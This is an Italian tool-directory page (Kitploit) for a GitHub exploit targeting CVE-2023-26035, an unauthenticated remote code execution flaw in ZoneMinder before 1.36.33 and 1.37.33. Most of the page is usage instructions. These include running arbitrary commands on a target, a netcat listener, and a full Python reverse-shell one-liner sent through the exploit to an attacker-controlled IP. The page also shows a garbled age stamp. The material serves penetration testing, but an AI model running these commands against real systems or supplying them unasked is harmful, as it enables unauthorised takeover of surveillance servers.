Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
zoneminder_CVE-2023-26035 — Exploit per CVE-2023-26035 che colpisce ZoneMinder < 1.36.33 e < 1.37.33 | Kitploit
Strumenti/GitHubGitHub/0xfalafel/zoneminder_cve-2023-26035
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and ControlRed Teaming
GitHub0xfalafel/zoneminder_cve-2023-26035

zoneminder_CVE-2023-26035

Exploit per CVE-2023-26035 che colpisce ZoneMinder < 1.36.33 e < 1.37.33

Vedi Repository
122 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Exploit - ZoneMinder CVE-2023-26035

Esiste una Esecuzione di codice in remoto non autenticata (RCE) che colpisce gli Snapshot di ZoneMinder.
Questo è un exploit per CVE-2023-26035.

Versioni affette

ZoneMinder < 1.36.33 e
ZoneMinder < 1.37.33.

Uso dell'exploit

Utilizzo

Verifica se il target è vulnerabile:

root@kitploit:~
python3 zoneminder.py http://target

Esegui un comando

root@kitploit:~
python3 zoneminder.py http://target command

Esempi

Test dell'esecuzione del comando con ping

Esegui tcpdump sull'interfaccia connessa al target (qui tun0) e filtra per pacchetti ICMP:

root@kitploit:~
sudo tcpdump -i tun0 icmp

Quindi esegui un ping verso il tuo IP. Assicurati di usare le virgolette " altrimenti il comando non verrà interpretato correttamente.

root@kitploit:~
python3 zoneminder.py http://target "ping -C 4 your_ip"

Reverse shell

Crea il listener con netcat:

root@kitploit:~
nc -lvnp 1337

Usa un one-liner di reverse shell:

root@kitploit:~
python3 zoneminder.py http://TARGET "python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"YOUR_IP\",1337));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'"

Maggiori informazioni su https://revshells.com.

Requisiti

L'exploit utilizza requests e BeautifulSoup. Installalo con:

root@kitploit:~
python3 -m pip install requests beautifulsoup4

Ringraziamenti

Volevo solo un exploit autonomo che non richiedesse Metasploit.
Lo script è derivato da https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/zoneminder_snapshots.rb

https://github.com/ZoneMinder/zoneminder/security/advisories/GHSA-72rg-h4vf-29gr

Scarica lo strumento